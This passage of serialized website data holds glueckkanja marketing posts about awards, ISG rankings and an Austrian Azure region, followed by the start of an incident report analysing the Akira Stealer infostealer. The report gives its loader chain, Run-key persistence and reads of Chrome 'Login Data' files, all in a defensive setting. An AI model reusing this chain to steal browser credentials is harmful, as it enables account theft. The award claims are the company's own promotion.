For three consecutive years, our company has been among the top partners in cybersecurity – a success story like no other.","Microsoft Security Excellence Awards 2025, Security MSSP of the Year 2025, Managed Security Service Provider, Cyber Security Microsoft, Microsoft Security Partner, Best Microsoft Security Partner 2025, Microsoft MSSP Finalist 2025, Microsoft Security Award Winner, Cybersecurity Provider with Microsoft Technology, Managed Security for Microsoft 365, Microsoft Intelligent Security Association (MISA) Partner, RSA Conference 2025 San Francisco, Security Excellence Awards Microsoft, MISA Partner Microsoft, Microsoft Security Solutions for Enterprises, Cybersecurity Trends 2025",[7744,7746],{"lang":2260,"href":7745},"/blog/corporate/2025/03/mssp-2025",{"lang":2263,"href":7747},"/blog/corporate/2025/03/mssp-2025-es",{"items":7749},[7750],{"text":7751,"name":7752,"company":7753,"alt":7752},"I’m very pleased to extend my warmest congratulations to this year’s finalists for the Microsoft Security Excellence Awards. These are presented each year to recognize the outstanding achievements of our Microsoft Intelligent Security Association members as they improve customers' ability to identify and respond to security threats. Our community is made up of the most reliable and trusted security vendors worldwide. This year we received hundreds of quality submissions from partners and Microsoft stakeholders, so this year's finalists stood out in a crowd of exceptional talent. It’s my pleasure to acknowledge and celebrate their work over the past year.","Maria Thomson","Director, Microsoft Intelligent Security Association",{"quote":2168,"infos":7755},{"bgColor":6344,"color":5865,"boxBgColor":6345,"boxColor":5863,"headline":5933,"subline":7756,"level":41,"textStyling":2204,"flush":2205,"person":7757,"form":7761},"As a leading Microsoft Security MSSP, we protect companies from cyber threats every day. 
Let's talk and strengthen your cyber defenses together!",{"image":5936,"cloudinary":2181,"alt":5937,"name":5937,"detailsHeader":5269,"details":7758},[7759,7760],{"text":5272,"href":5273,"details":5873,"icon":5275},{"text":5277,"href":5278,"icon":5279},{"ctaText":5281,"cta":7762,"method":2169,"action":2216,"fields":7763},{"skin":2215},[7764,7765,7766,7767,7768,7770,7771],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":2236,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},{"type":2241,"id":2247,"value":7769},"Form: Blog MSSP 2025 | EN",{"type":2241,"id":2250,"value":2251},{"type":2241,"id":2253},"/posts/2025-03-04-mssp-2025",{"title":7666,"description":7734},"posts/2025-03-04-mssp-2025",[2972,2971,2176,5113],"YY4vTqUIXYJ2s54Iixe-3J7kVLd0ls7auz0GdWgMduw",{"id":7778,"title":7779,"author":7780,"body":7781,"cta":2166,"description":65,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":7857,"moment":7859,"navigation":2181,"path":7899,"seo":7900,"stem":7901,"tags":7902,"webcast":2168,"__hash__":7906},"content_en/posts/2025-03-12-azure-goes-austria.md","Hello Clöud",[2535],{"type":9,"value":7782,"toc":7853},[7783,7787,7789,7792,7818,7821,7825,7827,7830,7850],[41,7784,7786],{"id":7785},"a-cloud-region-that-changes-everything","A Cloud Region That Changes Everything!",[12,7788,31],{},[12,7790,7791],{},"Now there is an answer to all these challenges: Microsoft is building its own cloud region in Austria with state-of-the-art data centers and maximum performance. 
This means for you: You now get the global power of a public cloud with the security of local data storage!",[1254,7793,7794,7800,7806,7812],{},[1257,7795,7796,7799],{},[251,7797,7798],{},"Maximum Performance:"," lower latency, higher scalability, more efficiency",[1257,7801,7802,7805],{},[251,7803,7804],{},"Local Data Storage:"," all data stays in Austria – secure, compliant, and protected",[1257,7807,7808,7811],{},[251,7809,7810],{},"Increased Security & Resilience:"," state-of-the-art infrastructure with multiple layers of security",[1257,7813,7814,7817],{},[251,7815,7816],{},"Sustainable IT:"," up to 93% more energy-efficient than traditional data centers",[12,7819,7820],{},"But a cloud region alone is not enough – the right partner makes the difference. This is where we at glueckkanja come into play.",[41,7822,7824],{"id":7823},"we-get-you-ready-for-the-local-future-of-your-it","We Get You Ready for the Local Future of Your IT!",[12,7826,31],{},[12,7828,7829],{},"In Germany, we are among the leading Microsoft partners for cloud migration. Now our expertise is also available in the new Microsoft Cloud Region Austria. As a strategic partner, we now seamlessly bring your company into the cloud. Do you have questions about data protection, system migration, or available financial benefits? We are here for you and accompany you from the first steps to the final go-live (and gladly beyond). 
Your benefits:",[1254,7831,7832,7838,7844],{},[1257,7833,7834,7837],{},[251,7835,7836],{},"Blueprint & Landing Zone Deployment:"," We enable you to migrate securely, quickly, and smoothly!",[1257,7839,7840,7843],{},[251,7841,7842],{},"AMM Funding:"," We provide comprehensive information about Microsoft funding for a cost-efficient transition!",[1257,7845,7846,7849],{},[251,7847,7848],{},"Seamless Transition:"," We accompany you step by step into the new AT-Cloud with standardized solutions!",[12,7851,7852],{},"Benefit now from our experience of over 100 successful cloud migrations and our top-notch Microsoft expertise.",{"title":65,"searchDepth":111,"depth":111,"links":7854},[7855,7856],{"id":7785,"depth":111,"text":7786},{"id":7823,"depth":111,"text":7824},{"lang":2171,"seoTitle":7858,"titleClass":2173,"date":7859,"categories":7860,"blogtitlepic":7861,"socialimg":7862,"customExcerpt":7863,"keywords":7864,"contactInContent":7865,"hreflang":7893,"scripts":7898,"published":2181},"Microsoft Cloud Region Austria: Local Cloud Power for Your Business","2025-03-12",[4232],"head-azure-goes-austria","/blog/heads/head-azure-goes-austria.png","Austrian companies are currently at a turning point. Digitalization is accelerating rapidly. At the same time, the demands on IT security, speed, and flexibility are increasing – and so are the challenges related to costs, regulatory hurdles, and the use of new technologies.","Microsoft Cloud Region Austria, Cloud Migration Austria, local data storage, Cloud Security, Microsoft Partner Austria, Cloud Performance, sustainable IT, Cloud Solutions Austria, Azure Migration, Landing Zone Deployment",{"quote":2181,"infos":7866},{"bgColor":2201,"headline":7867,"subline":7868,"level":41,"textStyling":2204,"flush":2205,"person":7869,"form":7876},"Get in Touch Now!","Do you want to learn more about how we can seamlessly and securely bring your company into the new Microsoft Cloud Region Austria? 
We are happy to personally present our offer, answer your questions about data protection and migration, and guide you step by step on your way to the cloud. Secure your personal consultation now!",{"image":7870,"cloudinary":2181,"alt":2535,"name":2535,"quotee":2535,"quoteeTitle":7871,"quote":7872,"detailsHeader":5269,"details":7873},"/people/people-florian-stoeckl.jpg","Azure Lead","The new Microsoft Cloud Region Austria is a real game-changer: Local data storage combined with global cloud power – an unbeatable mix for security, performance, and innovation. With our many years of expertise, we ensure that Austrian companies can now make the most of this opportunity.",[7874,7875],{"text":5272,"href":5273,"details":5274,"icon":5275},{"text":5266,"href":6190,"icon":5279},{"ctaText":2213,"cta":7877,"method":2169,"action":2216,"fields":7878},{"skin":2215},[7879,7880,7881,7882,7884,7886,7887,7889,7891,7892],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":5811,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":7883,"type":2232,"id":2233,"required":2181,"requiredMsg":2234},"Your Message to Us*",{"label":7885,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},"Your data will be stored with us for processing and answering your request. 
For more information on data protection, please see our \u003Ca href=\"/de/datenschutz\">privacy policy\u003C/a>.",{"type":2241,"id":2242,"value":4232},{"type":2241,"id":2244,"value":7888},"AT",{"type":2241,"id":2247,"value":7890},"Form: Blog Hello Clöud | EN",{"type":2241,"id":2250,"value":2251},{"type":2241,"id":2253},[7894,7896],{"lang":2260,"href":7895},"/blog/azure/2025/03/azure-goes-austria",{"lang":2263,"href":7897},"/blog/azure/2025/03/azure-goes-austria-es",{"slick":2181},"/posts/2025-03-12-azure-goes-austria",{"title":7779,"description":65},"posts/2025-03-12-azure-goes-austria",[4232,7903,7904,7905],"Cloud Migration","IT Infrastructure","Austria","TH18HrbdSmsHS28hv_2t0xudYJtx4K8Na_IKCnyvKfo",{"id":7908,"title":7909,"author":7910,"body":7911,"cta":2166,"description":65,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":7966,"moment":7967,"navigation":2181,"path":7977,"seo":7978,"stem":7979,"tags":7980,"webcast":2168,"__hash__":7981},"content_en/posts/2025-04-29-rsa-mssp-2025.md","glueckkanja remains among the Top 5 MSSPs worldwide",[2461],{"type":9,"value":7912,"toc":7962},[7913,7917,7919,7922,7925,7928,7931,7941,7944,7947,7950,7954,7956,7959],[41,7914,7916],{"id":7915},"three-years-in-a-row-glueckkanja-among-the-security-elite","Three Years in a Row: glueckkanja Among the Security Elite",[12,7918,31],{},[12,7920,7921],{},"For the third year in a row, we’re ranked among the world’s top five Managed Microsoft Security Providers. A triple win we're absolutely thrilled about. CEO Christian Kanja and Head of Security Jan Geisbauer were in San Francisco to celebrate the award together with the Microsoft Intelligent Security Association (MISA) and the international security community. RSA, Golden Gate Bridge, red carpet – it was all there.",[12,7923,7924],{},"And because innovation doesn’t just happen on stage, Christian and Jan took a ride into the future: cruising through the streets of San Francisco in a self-driving taxi. 
No driver, but tons of excitement – a perfect match for the spirit of RSA.\nThat's exactly what we aim for in cybersecurity too: trust is built when systems deliver what they promise.",[12,7926,7927],{},"The Microsoft Security Excellence Awards are among the most prestigious in the industry. They honor partners who set standards with innovation and service quality. Being recognized again in 2025 as one of the top Managed Security Service Providers is a special milestone for us – and a huge endorsement of our team’s daily work.",[12,7929,7930],{},"What brought us here:",[1254,7932,7933,7936,7939],{},[1257,7934,7935],{},"87% of our customers rate our technical expertise at the highest level",[1257,7937,7938],{},"94% praise our 24/7 services",[1257,7940,7713],{},[12,7942,7943],{},"Strong results that show: as a team, we’re achieving extraordinary things.",[12,7945,7946],{},"A huge thank-you to everyone who made this success possible – to Microsoft and the Microsoft Intelligent Security Association (MISA) for their close partnership and trust, to our customers for their loyalty, and to our CSOC team, who deliver outstanding work day in and day out.",[12,7948,7949],{},"In a strong security community, the best minds work together – and that collaboration keeps pushing us forward.",[41,7951,7953],{"id":7952},"looking-ahead","Looking Ahead",[12,7955,31],{},[12,7957,7958],{},"This award is both motivation and commitment for us. We're staying on it: with innovation, passion, and the drive to deliver Microsoft security solutions at the highest level. 
Together with Microsoft, our customers, and our partners, we're writing the next chapter of our success story.",[12,7960,7961],{},"glueckkanja – Champions League-level security.",{"title":65,"searchDepth":111,"depth":111,"links":7963},[7964,7965],{"id":7915,"depth":111,"text":7916},{"id":7952,"depth":111,"text":7953},{"lang":2171,"seoTitle":7909,"titleClass":2173,"date":7967,"categories":7968,"blogtitlepic":7969,"socialimg":7740,"customExcerpt":7970,"keywords":7742,"hreflang":7971,"scripts":7976},"2025-04-29",[2962],"head-rsa-2025","The Microsoft Security Excellence Awards are among the most prestigious honors in the industry. At RSA Conference 2025 in San Francisco, partners were once again recognized for setting standards through innovation, service quality, and dedication. We're absolutely thrilled that glueckkanja has once again been named a finalist for the 'Security MSSP of the Year Awards' in 2025 – a huge acknowledgment of the hard work our entire team puts in every single day.",[7972,7974],{"lang":2260,"href":7973},"/blog/corporate/202504/rsa-mssp-2025",{"lang":2263,"href":7975},"/blog/corporate/2025/04/rsa-mssp-2025-es",{"slick":2181},"/posts/2025-04-29-rsa-mssp-2025",{"title":7909,"description":65},"posts/2025-04-29-rsa-mssp-2025",[2972,2971,2176,5113],"ys69x_mwOAPW-TJbu7gOqW7VZPvgxmCwQJtdHBizh4w",{"id":7983,"title":7984,"author":7985,"body":7986,"cta":2166,"description":7990,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":8077,"moment":8079,"navigation":2181,"path":8132,"seo":8133,"stem":8134,"tags":8135,"webcast":2168,"__hash__":8136},"content_en/posts/2025-05-08-isg-germany-2025.md","Four in a row. glueckkanja once again a Leader in ISG",[2461],{"type":9,"value":7987,"toc":8070},[7988,7991,7994,7998,8000,8003,8007,8009,8014,8019,8023,8025,8030,8035,8039,8041,8046,8051,8055,8057,8062,8067],[12,7989,7990],{},"They say once is nothing. Twice is nice. But with a third time, you’re officially on the map. 
By that logic, we’ve now become a permanent fixture in the ISG Provider Lens™ study: After being named a Leader in 2021, 2023, and 2024, glueckkanja once again earns the title in 2025 – in both Microsoft 365 Services and Managed Azure.",[12,7992,7993],{},"As a long-standing Microsoft partner, we help companies around the globe move to the cloud – strategically, securely, and always with a clear sense of what’s feasible. In doing so, we contribute to global IT security and help drive innovation across a wide range of industries. We’re proud that the ISG study continues to recognize these efforts.",[41,7995,7997],{"id":7996},"isg-provider-lens-study-2025","ISG Provider Lens™ Study 2025",[12,7999,31],{},[12,8001,8002],{},"With its \"Microsoft Cloud Ecosystem\" study, ISG offers valuable insights through its Provider Lens™ series to help organizations align their strategies – from positioning and partnerships to go-to-market approaches. Providers are evaluated based on their portfolio and competitive strength in the Microsoft Cloud ecosystem, and then mapped across four quadrants: Product Challenger, Contender, Market Challenger, and Leader. 
But enough about the framework – let’s talk about how we performed.",[41,8004,8006],{"id":8005},"glueckkanja-is-leader-microsoft-365-services-midmarket","glueckkanja is Leader Microsoft 365 Services (Midmarket)",[12,8008,31],{},[12,8010,8011],{},[2642,8012],{"alt":5465,"src":8013},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/2025-isg-quadrant-m365-services-midmarket.png",[12,8015,8016],{},[3456,8017,8018],{},"\"glueckkanja is driving cloud transformation, efficiently integrating Microsoft 365 and Windows 365, and leveraging automation to streamline IT processes and ensure security!\"",[41,8020,8022],{"id":8021},"glueckkanja-is-leader-microsoft-365-services-large-accounts","glueckkanja is Leader Microsoft 365 Services (Large Accounts)",[12,8024,31],{},[12,8026,8027],{},[2642,8028],{"alt":5416,"src":8029},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/2025-isg-quadrant-m365-services-large-accounts.png",[12,8031,8032],{},[3456,8033,8034],{},"\"glueckkanja optimizes complex IT environments, seamlessly integrates Microsoft 365 and Windows 365, and uses automation for maximum scalability, security, and efficiency.\"",[41,8036,8038],{"id":8037},"glueckkanja-is-leader-managed-services-for-azure-midmarket","glueckkanja is Leader Managed Services for Azure (Midmarket)",[12,8040,31],{},[12,8042,8043],{},[2642,8044],{"alt":5381,"src":8045},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/2025-isg-quadrant-managed-services-for-azure-midmarket.png",[12,8047,8048],{},[3456,8049,8050],{},"\"glueckkanja delivers secure, scalable cloud infrastructures that reduce risk and increase efficiency. 
Thanks to automation and forward-thinking governance, businesses gain stability, control, and future-readiness.\"",[41,8052,8054],{"id":8053},"glueckkanja-is-leader-managed-services-for-azure-large-accounts","glueckkanja is Leader Managed Services for Azure (Large Accounts)",[12,8056,31],{},[12,8058,8059],{},[2642,8060],{"alt":5336,"src":8061},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/2025-isg-quadrant-managed-services-for-azure-large-accounts.png",[12,8063,8064],{},[3456,8065,8066],{},"\"glueckkanja is shaping the future of the cloud with automation, governance, and sustainability. Infrastructure as Code and iterative optimization create resilient, scalable, and cost-efficient solutions.\"",[12,8068,8069],{},"At this point, we’d just like to say a big thank you for all the recognition. If you're curious to dive deeper into the study results, just let us know – we’ll be happy to send you the full ISG summary.",{"title":65,"searchDepth":111,"depth":111,"links":8071},[8072,8073,8074,8075,8076],{"id":7996,"depth":111,"text":7997},{"id":8005,"depth":111,"text":8006},{"id":8021,"depth":111,"text":8022},{"id":8037,"depth":111,"text":8038},{"id":8053,"depth":111,"text":8054},{"lang":2171,"seoTitle":8078,"titleClass":2173,"date":8079,"categories":8080,"blogtitlepic":8081,"socialimg":8082,"customExcerpt":8083,"keywords":8084,"hreflang":8085,"footer":8090,"contactInContent":8091,"textImageTeaser":8120},"ISG 2025: glueckkanja again named Leader for Managed Services for Azure and Microsoft 365 Services","2025-05-08",[2962],"head-isg-2025.png","/blog/heads/head-isg-2025.png","The ISG Provider Lens™ 2025 study once again recognizes glueckkanja as a Leader in both Managed Services for Azure and Microsoft 365 Services. 
Awarded in both segments – Midmarket and Large Accounts – this confirms what has become increasingly clear over the past years: When it comes to standardization, automation, and scale for Microsoft environments, glueckkanja is the go-to partner.","Microsoft partner Germany, Managed Services Azure Germany, Microsoft 365 Services Germany, IT service provider Germany, Cloud services Germany, ISG Provider Lens Germany, glueckkanja Germany, Microsoft cloud Germany, ISG Leader 2025, IT security Germany, digital transformation Germany, Azure services Germany, Microsoft 365 consulting Germany, glueckkanja, glueckkanja Microsoft services, ISG award Microsoft",[8086,8088],{"lang":2260,"href":8087},"/blog/corporate/2025/05/isg-germany-2025",{"lang":2263,"href":8089},"/blog/corporate/2025/05/isg-germany-2025-es",{"noMargin":2181},{"quote":2181,"infos":8092},{"bgColor":2201,"headline":8093,"subline":8094,"level":41,"textStyling":2204,"flush":2205,"person":8095,"form":8103},"Request the study","Want to take a deeper look at the study results? 
Just reach out – we’ll send you the full ISG summary, including our skills and strengths.",{"image":8096,"cloudinary":2181,"alt":2415,"name":2415,"quotee":2415,"quoteeTitle":8097,"quote":8098,"detailsHeader":8099,"details":8100},"/people/people-michael-breither.jpg","COO","Being recognized by ISG once again validates our approach: standardized, scalable services for Microsoft platforms – with real added value for our customers.","We look forward\u003Cbr />to hearing from you!",[8101,8102],{"text":5272,"href":5273,"details":5274,"icon":5275},{"text":5266,"href":6190,"icon":5279},{"ctaText":2213,"cta":8104,"method":2169,"action":2216,"fields":8105},{"skin":2215},[8106,8107,8108,8109,8111,8113,8114,8116,8118,8119],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":8110,"type":2232,"id":2233,"required":2168,"requiredMsg":2234},"Your message to us",{"label":8112,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},"Your data will be stored and used to respond to your request. 
For more information on how we handle your data, please see our \u003Ca href=\"/en/privacy\">Privacy Policy\u003C/a>.",{"type":2241,"id":2242,"value":2962},{"type":2241,"id":2244,"value":8115},"DE",{"type":2241,"id":2247,"value":8117},"Form: Blog ISG Germany | EN",{"type":2241,"id":2250,"value":2251},{"type":2241,"id":2253},{"image":8121,"cloudinary":2181,"alt":8122,"bgColor":8123,"offset":2168,"list":8124,"left":2168,"float":2168,"firstColWidth":650,"secondColWidth":662,"copyClasses":8128,"headline":8129,"subline":8130,"spacing":8131},"/logos/isg-provider-lens-rising-star-ch.png","ISG Provider Lens","#fcd116",[8125],{"ctaText":8126,"ctaHref":8127,"ctaType":6003},"More info","/en/blog/corporate/2025/05/isg-switzerland-2025","richtext","\u003Cp>By the way, we’re a Rising Star in Switzerland!\u003Cbr />Merci, ISG!\u003C/p>","\u003Cp>Get the full scoop on our ISG results in Switzerland.\u003C/p>","space-top-2 space-bottom-2","/posts/2025-05-08-isg-germany-2025",{"title":7984,"description":7990},"posts/2025-05-08-isg-germany-2025",[2972,4401],"JgmVJq1h3hHtkdCxfyhUeMcaIzj-9b35VOq35fkeZ_E",{"id":8138,"title":8139,"author":8140,"body":8141,"cta":2166,"description":8145,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":8198,"moment":8079,"navigation":2181,"path":8244,"seo":8245,"stem":8246,"tags":8247,"webcast":2168,"__hash__":8248},"content_en/posts/2025-05-08-isg-switzerland-2025.md","Switzerland steps up. glueckkanja becomes ISG Rising Star",[2461],{"type":9,"value":8142,"toc":8193},[8143,8146,8149,8151,8153,8156,8160,8162,8168,8173,8177,8179,8185,8190],[12,8144,8145],{},"Bern is known for its stunning old town, the Zytglogge, the Federal Palace – and of course, the rose garden. Now there’s a new highlight: glueckkanja Switzerland has been named a \"Rising Star\" in the latest ISG Provider Lens™ study – recognized for our Microsoft 365 Services and Managed Services for Azure.",[12,8147,8148],{},"We’ve had boots on the ground in Bern since 2024. 
From here, as an experienced Microsoft partner, we help Swiss companies move to the cloud – strategically, securely, and always with a realistic view of what’s doable. In just twelve months, we’ve made a meaningful contribution to IT security in the Swiss business landscape and driven innovation across a variety of industries. Which makes it all the more rewarding to see our efforts now recognized by the ISG Provider Lens™.",[41,8150,7997],{"id":7996},[12,8152,31],{},[12,8154,8155],{},"The \"Microsoft Cloud Ecosystem\" study is part of ISG’s Provider Lens™ series, offering deep insights to help companies refine their strategic direction – from positioning and partnerships to go-to-market strategies. Providers are assessed based on their product portfolio and competitive strength in the Microsoft cloud ecosystem, and positioned in four quadrants: Product Challenger, Contender, Market Challenger, and Leader. That’s the theory – now let’s look at our results!",[41,8157,8159],{"id":8158},"glueckkanja-is-rising-star-microsoft-365-services","glueckkanja is Rising Star Microsoft 365 Services",[12,8161,31],{},[12,8163,8164],{},[2642,8165],{"alt":8166,"src":8167},"Microsoft 365 Services","https://res.cloudinary.com/c4a8/image/upload/blog/pics/Microsoft_365_Services.png",[12,8169,8170],{},[3456,8171,8172],{},"\"glueckkanja supports Swiss companies in secure cloud transformation, integrates Microsoft 365 and Windows 365, and streamlines IT processes through automation and scalability.\"",[41,8174,8176],{"id":8175},"glueckkanja-is-rising-star-managed-services-for-azure","glueckkanja is Rising Star Managed Services for Azure",[12,8178,31],{},[12,8180,8181],{},[2642,8182],{"alt":8183,"src":8184},"Managed Services for Azure","https://res.cloudinary.com/c4a8/image/upload/v1746721421/blog/pics/Managed_Services_for_Azure.png",[12,8186,8187],{},[3456,8188,8189],{},"\"glueckkanja is a Rising Star in Switzerland’s market for Azure Managed Services. 
With strong local presence, proven performance, and technological foresight, the company boosts security, automation, and scalability for future-ready cloud strategies."

With that, we say “Merci vielmals” – and raise a glass of Bärner Müntschi to celebrate. If you’d like to explore the full study in more detail, we’d be happy to send you the complete ISG overview of our strengths and capabilities.

**glueckkanja Switzerland named ISG ‘Rising Star’ 2025 for Microsoft 365 & Azure Services**

glueckkanja Switzerland has been named a 'Rising Star' by ISG in the categories Microsoft 365 Services and Managed Services for Azure. A recognition that shows: our standards, our ambition, and our services are setting the benchmark – even across borders.

Want to dive deeper into the study results? Just reach out – we’ll send you the full ISG overview, including our skills and strengths. Phone: +41 31 5611900.

> Being named a Rising Star proves that our approach is also resonating in Switzerland: standardized, secure Microsoft services – pragmatically implemented and offering real value to our customers.

By the way, in Germany we're a Leader in Microsoft 365 and Managed Azure! Thanks, ISG! Check out our full ISG results in Germany: /en/blog/corporate/2025/05/isg-germany-2025

---

# Inside Akira Stealer: A full technical analysis of a modular stealer

Author: Pascal Asch

# Prologue

It started like so many modern attacks do: quietly. A low-confidence Defender alert — **"Suspicious sequence of exploration activities"** — surfaced during the onboarding phase of a new customer into our glueckkanja Cyber Security Operations Center (CSOC).

There were no signature hits. No malware classifications. No real-time protection response. Just a single behavioral correlation in Microsoft 365 Defender, buried in the noise — and yet, unmistakably wrong.

While triaging the alert, one specific action caught my attention: `python.exe` had accessed both the `Login Data` and `Web Data` files inside a Chromium profile. Microsoft Defender immediately escalated this to a high-severity incident — **"Possible theft of passwords and other sensitive web browser information."**

This wasn’t a false positive. It was the tip of something deeper.

Tracing the telemetry backwards, I uncovered a generic startup-located binary — `Updater.exe` — which spawned a NodeJS-based wrapper (`main.exe`) that executed a command line to run a script named `astor.py` via `python.exe`.

```
Updater.exe → main.exe → cmd.exe → python.exe Crypto\Util\astor.py
```

The script didn’t just scrape credentials — it executed a sequence of post-compromise reconnaissance steps, including registry queries, system fingerprinting, and privilege-aware enumeration. It operated with surgical precision, mimicking native system behavior to evade detection. And it worked — almost.

At the time of first response:

- `Updater.exe` was flagged by only **1 out of 69** engines on VirusTotal.
- `main.exe`, `astor.py`, and all associated components were not really flagged on VirusTotal.
- No files were signed. No elevated context. Just "ordinary" processes doing very non-ordinary things.

`Updater.exe` didn’t touch credentials. That task was reserved for `astor.py`, the in-memory Python payload — a file that, by design, left almost no trace.

Within **21 minutes**, the affected system was isolated from the network. Within **70 minutes**, credentials were rotated across all affected scopes: internal identities, SaaS platforms, third-party services.

But the real turning point came when we extracted and fully decrypted the Python payload. What we found was not a generic stealer — it was a custom deployment of **Akira Stealer v2**, a commercially distributed malware family sold via Telegram.

Thanks to our in-house threat intelligence and reverse engineering capabilities, we were able to reconstruct the full functionality of the malware, extract all embedded indicators, and understand its staging, exfiltration, and credential targeting logic in detail.

More importantly — we didn’t stop at technical attribution. We went further.

We were able to provide the client with a **complete dataset of exfiltrated credentials**: over **100 unique username-password combinations**, including access credentials to cloud services, CRM systems, internal platforms, and even personal tools used by key employees. The theft had been ongoing for **months** — and we could account for all of it.

Using insights gained from this case, we built a **post-infection analysis tool** that scans affected systems, reconstructs credential access patterns, and generates detailed forensic reports — mapping exactly what was stolen, when, and from where.

We’ll share a glimpse of that scanner at the end of this report.

Because this is more than just an incident.
This is how we investigate. This is how we protect.

**Welcome to the glueckkanja CSOC.**
This is how we work — because breaches don't wait.

# 1. Initial Event and Triage Summary

On March 31, 2025, Microsoft Defender for Endpoint generated an alert labeled **"Suspicious sequence of exploration activities"** on a Windows 10 64-bit endpoint. I began the triage based on this signal and reviewed the affected system using the process tree, system timeline, and evidence correlated by Defender.

## 1.1 Timeline-Based Triage

The alert pointed to a sequence of processes that warranted further inspection. During initial review, I observed the following access patterns to Chrome browser data within the local user profile:

- `%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data`
- `%LOCALAPPDATA%\Google\Chrome\User Data\Default\Web Data`

These accesses were initiated by a process named `Updater.exe`. While Microsoft Defender had not flagged the binary based on heuristic or behavioral analysis, I found a detection for `Updater.exe` on VirusTotal — flagged by a single engine at that point in time.

![Microsoft Defender](https://res.cloudinary.com/c4a8/image/upload/v1749797184/blog/pics/microsoft-defender.png)

The full observed execution chain was as follows:

```
winlogon.exe
└── userinit.exe
    └── explorer.exe
        └── Updater.exe
            └── main.exe
                └── cmd.exe /d /s /c "python.exe Crypto\Util\astor.py"
                    └── python.exe Crypto\Util\astor.py
```

At this stage, no deeper static or dynamic analysis of the involved files had been performed. My focus was on understanding the high-level behavior and context. The process names and file paths were generic, and no suspicious command-line arguments were present beyond the chained Python execution.

## 1.2 Initial Response

Within **21 minutes** of the initial alert, I initiated host isolation using Defender for Endpoint’s isolation features. The goal was to prevent potential further spread or exfiltration.

Within the first **70 minutes**, we proceeded to rotate credentials that were known to be used on the affected host — covering internal systems, SaaS platforms, and critical third-party vendors.

The reverse engineering process began after the first containment. The following sections document the technical deep dive that followed to investigate the breach.

## 1.3 Response Summary – Fast, Transparent, Impact-Driven

Our response combined speed, expertise, and operational excellence—backed by proven workflows and full visibility for the customer.

- **Detection to full containment in under 90 minutes**
  Defender alerts, network isolation, antivirus scan, and credential revocation executed rapidly and in concert.
- **Deep-dive forensic response within 48 hours**
  Including full disk and memory analysis, browser artifact review, credential dumping detection, and behavioral reconstruction of attacker activity.
- **Secure data recovery & evidence handling**
  The stolen data—including cookies, passwords, tokens, and browser profiles—was recovered, forensically archived, and handed off securely to the customer.
- **End-to-end visibility and communication**
  Every step—from first alert to remediation and debrief—was fully documented, shared in real time, and summarized in a structured CSIRT handover.

> This incident showcases how glueckkanja CSOC doesn’t just stop malware—we dismantle its effects, restore control to our customers, and turn every incident into insight.

# 2. Malware Architecture and Execution Chain Overview

The malware observed on the affected endpoint followed a structured, multi-stage architecture with clear separation of responsibilities: deployment, decoding, execution, and data exfiltration.

## 2.1 Execution Chain Overview

The observed execution flow was as follows:

```
Updater.exe
   └── main.exe
       └── cmd.exe
           └── python.exe astor.py
```

Each component in the chain contributed to stealth, modularity, and evasion. The architecture leveraged legitimate runtimes and standard OS interpreters to bypass detection mechanisms.

### 2.1.1 Origin Uncertainty: Missing Initial Vector

Despite extensive analysis of the post-compromise environment, the initial access vector could not be conclusively determined. This uncertainty stems primarily from the fact that the malware had remained active for an estimated **six months prior to detection** — exceeding the **log retention period enforced by Microsoft Defender for Endpoint**.

As a result, no telemetry or forensic artifacts were available from the original time of infection. No initial process creation events, file drops, or command-line entries related to the delivery stage were recoverable from Defender’s timeline or associated sensors.

Based on contextual indicators and OSINT sources, a likely infection vector may have involved:

- **Trojanized installers** of cracked or modded gaming software
- **Fake utilities** or "performance boosters" distributed via forums and third-party sites
- **Malicious browser extensions** targeting specific user interests (e.g., crypto-related tools or Discord enhancements)

However, these remain speculative.

No confirmed dropper, phishing email, or compromised website could be identified during the investigation. While the malware architecture and execution chain were fully reconstructed, the **initial point of compromise (MITRE ATT&CK T1190 / T1566)** could not be validated.

### 2.1.2 `Updater.exe` – Initial Loader

When reviewing the process tree in Microsoft 365 Defender, `Updater.exe` stood out immediately — not because of what it did, but because of how silently it embedded itself into the system’s execution flow.

This binary was registered for automatic execution via the standard Windows Run key:

```
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
```

That meant it would launch every time the user logged into their session — a classic persistence mechanism that requires no elevated privileges and often slips through unnoticed in EDR telemetry.

- **File Type**: Windows PE executable (32-bit)
- **Signature**: Unsigned
- **VirusTotal Detection**: 1 out of 69 engines at the time of triage
- **Execution Context**: Medium integrity, user session
- **Location**: `AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\`

The file itself was small, cleanly compiled, and unremarkable from a static analysis standpoint. No suspicious strings, no encrypted sections, and no indicators of obfuscation or packing. It imported only a minimal set of standard Windows API functions and contained no embedded payload.

However, its behavior was more telling. Once launched, `Updater.exe` extracted an Electron application from a bundled archive — a self-contained NodeJS runtime packaged using standard Electron tooling. This unpacked folder contained an executable named `main.exe`, which was subsequently launched as a child process.

```
Updater.exe → main.exe
```

There were no network indicators at this stage, no process injection, and no anomaly in privileges or token elevation. The entire role of `Updater.exe` appeared to be that of a loader — delivering a second-stage component (`main.exe`) into the environment, likely with the goal of maintaining stealth and modularity.

This kind of architectural separation is common in modern commodity malware and stealer toolkits. The initial loader acts merely as a deployment stub, allowing the heavier logic — often obfuscated, interpreted, or dynamically generated — to be contained in later stages.

